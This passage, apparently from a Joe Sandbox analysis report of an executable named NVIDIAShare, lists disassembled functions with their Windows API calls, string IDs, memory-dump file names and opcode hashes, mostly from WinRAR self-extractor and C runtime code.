                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
                                                            • Instruction ID: 01e22e2e6d2abbea84964a27813895f95d7ba3ef1aa2a810036fd3d266d65a0b
                                                            • Opcode Fuzzy Hash: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
                                                            • Instruction Fuzzy Hash: 50515A2670032391EB746A6DD8317B673E4DFA0758F99045EEAC18B1C8FB6D88818261
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0102FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0102F6CF
                                                            • __fassign.LIBCMT ref: 0102F74A
                                                            • __fassign.LIBCMT ref: 0102F765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0102F78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 9e3cb9afe3e8fee8ea54653eafd8b524151f3635baf79342708bf1779dd7ee4b
                                                            • Instruction ID: 65a1d511bb19669f7df425ab9cb1dcddc75edcf7d8d28d17e0bd504c170005a6
                                                            • Opcode Fuzzy Hash: 9e3cb9afe3e8fee8ea54653eafd8b524151f3635baf79342708bf1779dd7ee4b
                                                            • Instruction Fuzzy Hash: EF51B6B1D0025A9FDB10CFA8D885AEEFBF8FF09310F14415AE995E7251E771A940CBA0
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 01022937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0102293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 010229C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 010229F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 01022A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: 06bfc4f05fc9d4475fb177d7d609e6c3a67f46acfdb95a9c46d0eb4ae11b0a87
                                                            • Instruction ID: f3f7b3ca64b21dfbc705c6b47e95f3eb92a020606cac315b7f150a5e2c7df5da
                                                            • Opcode Fuzzy Hash: 06bfc4f05fc9d4475fb177d7d609e6c3a67f46acfdb95a9c46d0eb4ae11b0a87
                                                            • Instruction Fuzzy Hash: 1941A230A00229AFCF10DFACC880A9EBFF5BF45364F1481A5E895AB392D775D955CB90
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 01019EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 01019F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 01019FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 01019FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 01019FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: 68075019b895c002f67029064c5468feb9d67fa10530555958e737b20652f900
                                                            • Instruction ID: 0ad53bd097c111e328bfe78f90bff9c6bd1d125c2d8257d4577bc6f76f565399
                                                            • Opcode Fuzzy Hash: 68075019b895c002f67029064c5468feb9d67fa10530555958e737b20652f900
                                                            • Instruction Fuzzy Hash: 2741BF32504210EFDB625F689C48B6BBFB8FF48755F004599F9C99E05ACB39D908CBA1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 20bc620946a266f847a315b57d534d067da2229c7d0edcda8da3f8cad4dbfc4f
                                                            • Instruction ID: 38924c30123a56f2ce046835b1cd32376b6faf3910bc98440ca2b0d0564023b0
                                                            • Opcode Fuzzy Hash: 20bc620946a266f847a315b57d534d067da2229c7d0edcda8da3f8cad4dbfc4f
                                                            • Instruction Fuzzy Hash: EC31503364434655DE31AF589C51BBB73E8FB80714F90441EF8C68B284FA6CA94883E1
                                                            APIs
                                                              • Part of subcall function 0102C868: _free.LIBCMT ref: 0102C891
                                                            • _free.LIBCMT ref: 0102C8F2
                                                              • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                              • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                            • _free.LIBCMT ref: 0102C8FD
                                                            • _free.LIBCMT ref: 0102C908
                                                            • _free.LIBCMT ref: 0102C95C
                                                            • _free.LIBCMT ref: 0102C967
                                                            • _free.LIBCMT ref: 0102C972
                                                            • _free.LIBCMT ref: 0102C97D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: d49eef682295cc6da29031b70fd06714aba967410b75ace28d1d2930ad781325
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: ED111F71580B26AAF520B7B1CD05FCF7BEC9F25B10F508C16F2DD66061DAA5B509CB50
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0101E669,0101E5CC,0101E86D), ref: 0101E605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0101E61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0101E630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
                                                            • Instruction ID: eed29a717fad5c5207547d9515824649d79a3a4fc0f0b95e3132f7e2b72a8293
                                                            • Opcode Fuzzy Hash: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
                                                            • Instruction Fuzzy Hash: 3AF0C2317402229B5B734E69DC94A6E76CC6F8D6D13400CB9EEC5DB11DEB2DC4909B90
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 010114C2
                                                              • Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010114E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 01011500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 01011513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011533
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
                                                            • Instruction ID: f583d2db3ec9669b8f681982f0b0e9978481b5ab90780b13c27df6cb8ad16a9f
                                                            • Opcode Fuzzy Hash: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
                                                            • Instruction Fuzzy Hash: 4231E779108346ABC704DFA8C88499BBBF8BF98614F444A1EF999C3210E734D549CBA6
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,01022AF1,010202FC,0101FA34), ref: 01022B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01022B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022B2F
                                                            • SetLastError.KERNEL32(00000000,01022AF1,010202FC,0101FA34), ref: 01022B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: aec652aad98712bc9504fbb49be1991999bf2b285a3eeb7c4c2c70fad8b446df
                                                            • Instruction ID: bb55ba9f954199ee4e3bc201621d1030e3cecd48d3f3146a1eda6f64354b6752
                                                            • Opcode Fuzzy Hash: aec652aad98712bc9504fbb49be1991999bf2b285a3eeb7c4c2c70fad8b446df
                                                            • Instruction Fuzzy Hash: C501F7321083326EAA7B29F8BC84A6B2F9DFF55774B60077AF5D0490D4EF1A48009344
                                                            APIs
                                                            • GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
                                                            • _free.LIBCMT ref: 0102981C
                                                            • _free.LIBCMT ref: 01029844
                                                            • SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 01029851
                                                            • SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
                                                            • _abort.LIBCMT ref: 01029863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 67f4cd3fce6b0d182a956079619c123b32db81bee57c7cd1c03e4f2cd32049f7
                                                            • Instruction ID: fef6a1ff4ba0ac7d96841ccccfb77500a72f15c4e6cfb2b33daae18bd342465a
                                                            • Opcode Fuzzy Hash: 67f4cd3fce6b0d182a956079619c123b32db81bee57c7cd1c03e4f2cd32049f7
                                                            • Instruction Fuzzy Hash: 23F02D35100633E6D7633238BC48B5B2BEDAFE0778F290125F7D496145EE7584068224
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101DC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101DC72
                                                            • TranslateMessage.USER32(?), ref: 0101DC7C
                                                            • DispatchMessageW.USER32(?), ref: 0101DC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
                                                            • Instruction ID: d24f8354f28d46ca2992a11095e7357c1ccffc76a57a4ffd0eac8bcd5c2e9692
                                                            • Opcode Fuzzy Hash: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
                                                            • Instruction Fuzzy Hash: 8BF08C32A0021ABBDB306AE5EC4CDCBBFBCFF42791B004411F54AD6018D63A804AC7E0
                                                            APIs
                                                              • Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0
                                                              • Part of subcall function 0100B92D: _wcsrchr.LIBVCRUNTIME ref: 0100B944
                                                            • _wcslen.LIBCMT ref: 0100C197
                                                            • _wcslen.LIBCMT ref: 0100C1DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
                                                            • Instruction ID: f8fdc0eb304a38a48822d4014724dbe1f3f42bbe1e60aee1189b1e60e97c2f4e
                                                            • Opcode Fuzzy Hash: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
                                                            • Instruction Fuzzy Hash: 3C414821540312A6F733AF788A41ABB77E8EF42704F100ACEF9C56B4C0EB6449C2C391
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 0101CE9D
                                                              • Part of subcall function 0100B690: _wcslen.LIBCMT ref: 0100B696
                                                            • _swprintf.LIBCMT ref: 0101CED1
                                                              • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                            • SetDlgItemTextW.USER32(?,00000066,0104946A), ref: 0101CEF1
                                                            • EndDialog.USER32(?,00000001), ref: 0101CFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            • Opcode ID: 0c0ea83e644ad4615165ca0aeade4673aae32a78bc128b18b27bfe0b96427931
                                                            • Instruction ID: 2a6ccd115dbcf8699bc6ce260b7aa61646cbd0c5dabdd4af58eddabe270d4c14
                                                            • Opcode Fuzzy Hash: 0c0ea83e644ad4615165ca0aeade4673aae32a78bc128b18b27bfe0b96427931
                                                            • Instruction Fuzzy Hash: 3541A8B1940659AADF219B94CD44EEE77FCEB45300F4080A6F989E7049DE798A44CF60
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0100BB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0100A275,?,?,00000800,?,0100A23A,?,0100755C), ref: 0100BBC5
                                                            • _wcslen.LIBCMT ref: 0100BC3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
                                                            • Instruction ID: 5968d4eefcf2566524364e8e65dac9968c17bf7c32b67e8de69d086888e5e094
                                                            • Opcode Fuzzy Hash: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
                                                            • Instruction Fuzzy Hash: EA419F3944021BA6EF22AF64CC40EEE77ADBF55390F1044A6F9D4A7294EF74D9908B60
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 0101B6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0101B712
                                                            • DeleteObject.GDI32(00000000), ref: 0101B744
                                                            • DeleteObject.GDI32(00000000), ref: 0101B767
                                                              • Part of subcall function 0101A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
                                                              • Part of subcall function 0101A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
                                                              • Part of subcall function 0101A6C2: LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
                                                              • Part of subcall function 0101A6C2: LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
                                                              • Part of subcall function 0101A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
                                                              • Part of subcall function 0101A6C2: GlobalLock.KERNEL32(00000000), ref: 0101A73E
